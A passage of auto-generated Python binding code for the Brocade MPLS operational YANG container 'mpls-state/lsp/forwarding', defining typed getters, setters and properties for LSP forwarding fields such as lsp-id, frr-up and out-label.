self.__primary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__lsp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__frr_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__frr_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'lsp', u'forwarding']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'lsp', u'forwarding']
def _get_tunnel_vif_index(self):
"""
Getter method for tunnel_vif_index, mapped from YANG variable /mpls_state/lsp/forwarding/tunnel_vif_index (uint32)
YANG Description: lsp tunnel vif index
"""
return self.__tunnel_vif_index
def _set_tunnel_vif_index(self, v, load=False):
"""
Setter method for tunnel_vif_index, mapped from YANG variable /mpls_state/lsp/forwarding/tunnel_vif_index (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tunnel_vif_index is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tunnel_vif_index() directly.
YANG Description: lsp tunnel vif index
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tunnel_vif_index must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tunnel_vif_index = t
if hasattr(self, '_set'):
self._set()
def _unset_tunnel_vif_index(self):
self.__tunnel_vif_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_lsp_id(self):
"""
Getter method for lsp_id, mapped from YANG variable /mpls_state/lsp/forwarding/lsp_id (uint32)
YANG Description: lsp_forwarding_lsp_id
"""
return self.__lsp_id
def _set_lsp_id(self, v, load=False):
"""
Setter method for lsp_id, mapped from YANG variable /mpls_state/lsp/forwarding/lsp_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_id() directly.
YANG Description: lsp_forwarding_lsp_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__lsp_id = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_id(self):
self.__lsp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_forwarding_up(self):
"""
Getter method for forwarding_up, mapped from YANG variable /mpls_state/lsp/forwarding/forwarding_up (boolean)
YANG Description: lsp_forwarding_up
"""
return self.__forwarding_up
def _set_forwarding_up(self, v, load=False):
"""
Setter method for forwarding_up, mapped from YANG variable /mpls_state/lsp/forwarding/forwarding_up (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding_up is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding_up() directly.
YANG Description: lsp_forwarding_up
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """forwarding_up must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__forwarding_up = t
if hasattr(self, '_set'):
self._set()
def _unset_forwarding_up(self):
self.__forwarding_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_primary_active(self):
"""
Getter method for primary_active, mapped from YANG variable /mpls_state/lsp/forwarding/primary_active (boolean)
YANG Description: lsp_forwarding_primary_active
"""
return self.__primary_active
def _set_primary_active(self, v, load=False):
"""
Setter method for primary_active, mapped from YANG variable /mpls_state/lsp/forwarding/primary_active (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_primary_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_primary_active() directly.
YANG Description: lsp_forwarding_primary_active
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """primary_active must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__primary_active = t
if hasattr(self, '_set'):
self._set()
def _unset_primary_active(self):
self.__primary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_primary_up(self):
"""
Getter method for primary_up, mapped from YANG variable /mpls_state/lsp/forwarding/primary_up (boolean)
YANG Description: lsp_forwarding_primary_up
"""
return self.__primary_up
def _set_primary_up(self, v, load=False):
"""
Setter method for primary_up, mapped from YANG variable /mpls_state/lsp/forwarding/primary_up (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_primary_up is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_primary_up() directly.
YANG Description: lsp_forwarding_primary_up
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """primary_up must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__primary_up = t
if hasattr(self, '_set'):
self._set()
def _unset_primary_up(self):
self.__primary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_secondary_active(self):
"""
Getter method for secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_active (boolean)
YANG Description: lsp_forwarding_secondary_active
"""
return self.__secondary_active
def _set_secondary_active(self, v, load=False):
"""
Setter method for secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_active (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_secondary_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secondary_active() directly.
YANG Description: lsp_forwarding_secondary_active
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_active must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__secondary_active = t
if hasattr(self, '_set'):
self._set()
def _unset_secondary_active(self):
self.__secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_secondary_up(self):
"""
Getter method for secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_up (boolean)
YANG Description: lsp_forwarding_secondary_up
"""
return self.__secondary_up
def _set_secondary_up(self, v, load=False):
"""
Setter method for secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_up (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_secondary_up is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secondary_up() directly.
YANG Description: lsp_forwarding_secondary_up
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_up must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__secondary_up = t
if hasattr(self, '_set'):
self._set()
def _unset_secondary_up(self):
self.__secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_selected_secondary_active(self):
"""
Getter method for selected_secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_active (boolean)
YANG Description: lsp_forwarding_selected_secondary_active
"""
return self.__selected_secondary_active
def _set_selected_secondary_active(self, v, load=False):
"""
Setter method for selected_secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_active (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_selected_secondary_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_selected_secondary_active() directly.
YANG Description: lsp_forwarding_selected_secondary_active
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """selected_secondary_active must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__selected_secondary_active = t
if hasattr(self, '_set'):
self._set()
def _unset_selected_secondary_active(self):
self.__selected_secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_selected_secondary_up(self):
"""
Getter method for selected_secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_up (boolean)
YANG Description: lsp_forwarding_selected_secondary_up
"""
return self.__selected_secondary_up
def _set_selected_secondary_up(self, v, load=False):
"""
Setter method for selected_secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_up (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_selected_secondary_up is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_selected_secondary_up() directly.
YANG Description: lsp_forwarding_selected_secondary_up
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """selected_secondary_up must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__selected_secondary_up = t
if hasattr(self, '_set'):
self._set()
def _unset_selected_secondary_up(self):
self.__selected_secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_frr_active(self):
"""
Getter method for frr_active, mapped from YANG variable /mpls_state/lsp/forwarding/frr_active (boolean)
YANG Description: lsp_forwarding_frr_active
"""
return self.__frr_active
def _set_frr_active(self, v, load=False):
"""
Setter method for frr_active, mapped from YANG variable /mpls_state/lsp/forwarding/frr_active (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_frr_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_frr_active() directly.
YANG Description: lsp_forwarding_frr_active
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr_active must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__frr_active = t
if hasattr(self, '_set'):
self._set()
def _unset_frr_active(self):
self.__frr_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_frr_up(self):
"""
Getter method for frr_up, mapped from YANG variable /mpls_state/lsp/forwarding/frr_up (boolean)
YANG Description: lsp_forwarding_frr_up
"""
return self.__frr_up
def _set_frr_up(self, v, load=False):
"""
Setter method for frr_up, mapped from YANG variable /mpls_state/lsp/forwarding/frr_up (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_frr_up is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_frr_up() directly.
YANG Description: lsp_forwarding_frr_up
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """frr_up must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__frr_up = t
if hasattr(self, '_set'):
self._set()
def _unset_frr_up(self):
self.__frr_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_instance_id(self):
"""
Getter method for instance_id, mapped from YANG variable /mpls_state/lsp/forwarding/instance_id (uint32)
YANG Description: lsp_forwarding_instance_id
"""
return self.__instance_id
def _set_instance_id(self, v, load=False):
"""
Setter method for instance_id, mapped from YANG variable /mpls_state/lsp/forwarding/instance_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_instance_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_instance_id() directly.
YANG Description: lsp_forwarding_instance_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instance_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__instance_id = t
if hasattr(self, '_set'):
self._set()
def _unset_instance_id(self):
self.__instance_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_out_port_id(self):
"""
Getter method for out_port_id, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_id (uint32)
YANG Description: lsp_forwarding_out_port_id
"""
return self.__out_port_id
def _set_out_port_id(self, v, load=False):
"""
Setter method for out_port_id, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_out_port_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_out_port_id() directly.
YANG Description: lsp_forwarding_out_port_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """out_port_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__out_port_id = t
if hasattr(self, '_set'):
self._set()
def _unset_out_port_id(self):
self.__out_port_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_out_port_name(self):
"""
Getter method for out_port_name, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_name (string)
YANG Description: lsp_forwarding_out_port_name
"""
return self.__out_port_name
def _set_out_port_name(self, v, load=False):
"""
Setter method for out_port_name, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_out_port_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_out_port_name() directly.
YANG Description: lsp_forwarding_out_port_name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """out_port_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__out_port_name = t
if hasattr(self, '_set'):
self._set()
def _unset_out_port_name(self):
self.__out_port_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_out_label(self):
"""
Getter method for out_label, mapped from YANG variable /mpls_state/lsp/forwarding/out_label (uint32)
YANG Description: lsp_forwarding_out_label
"""
return self.__out_label
def _set_out_label(self, v, load=False):
"""
Setter method for out_label, mapped from YANG variable /mpls_state/lsp/forwarding/out_label (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_out_label is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_out_label() directly.
YANG Description: lsp_forwarding_out_label
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """out_label must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__out_label = t
if hasattr(self, '_set'):
self._set()
def _unset_out_label(self):
self.__out_label = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
tunnel_vif_index = __builtin__.property(_get_tunnel_vif_index)
lsp_id = __builtin__.property(_get_lsp_id)
forwarding_up = __builtin__.property(_get_forwarding_up)
primary_active = __builtin__.property(_get_primary_active)
primary_up = __builtin__.property(_get_primary_up)
secondary_active = __builtin__.property(_get_secondary_active)
secondary_up = __builtin__.property(_get_secondary_up)
selected_secondary_active = __builtin__.property(_get_selected_secondary_active)
selected_secondary_up = __builtin__.property(_get_selected_secondary_up)
frr_active = __builtin__.property(_get_frr_active)
frr_up = __builtin__.property(_get_frr_up)
instance_id = __builtin__.property(_get_instance_id)
out_port_id = __builtin__.property(_get_out_port_id)
out_port_name = __builtin__.property(_get_out_port_name)
out_label = __builtin__.property(_get_out_label)
